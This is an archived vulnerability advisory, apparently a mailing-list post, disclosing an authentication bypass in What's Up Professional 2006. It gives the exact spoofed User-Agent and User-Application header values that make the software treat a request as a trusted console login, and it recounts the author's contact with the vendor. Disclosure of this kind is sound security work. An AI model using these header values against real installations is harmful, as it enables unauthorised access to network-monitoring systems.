AOH :: HP Unsorted W :: B06-2266.HTM

What's up professional spoofing authentication bypass



What's Up Professional Spoofing Authentication Bypass
What's Up Professional Spoofing Authentication Bypass



What's Up Professional 2006 is vulnerable to a spoofing attack whereby
the attacker can trick the application into thinking he/she is making a
request from the console (which is considered trusted). This attack will
allow the attacker to bypass the authentication mechanism of the
application and login without credentials.

The application believes that if it is passed the following headers in
an HTTP request, then it is a trusted request:
User-Agent: Ipswitch/1.0
User-Application: NmConsole

These headers can be easily spoofed. An easy way to accomplish the spoof
is to use a webproxy such as webscarab (see owasp.org).

I have put a more detailed text file here:
http://www.ftusecurity.com/pub/whatsup.public.pdf 

I contacted IPSwitch. They said the issue would be fixed in the next
release. I followed up twice to find a status and did not receive a reply.

Since the release of some What's Up Professional vulnerabilities
recently -- see: http://www.securityfocus.com/archive/1/433808 -- I 
decided to release this information. I've been burned in the past by
reporting vulnerabilities responsibly to vendors, someone else
irresponsibly discloses the issue publicly before the fix is released
and the company does not credit me with the initial report.

Sincerely,
Kenneth F. Belva, CISSP
http://www.ftusecurity.com 



The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.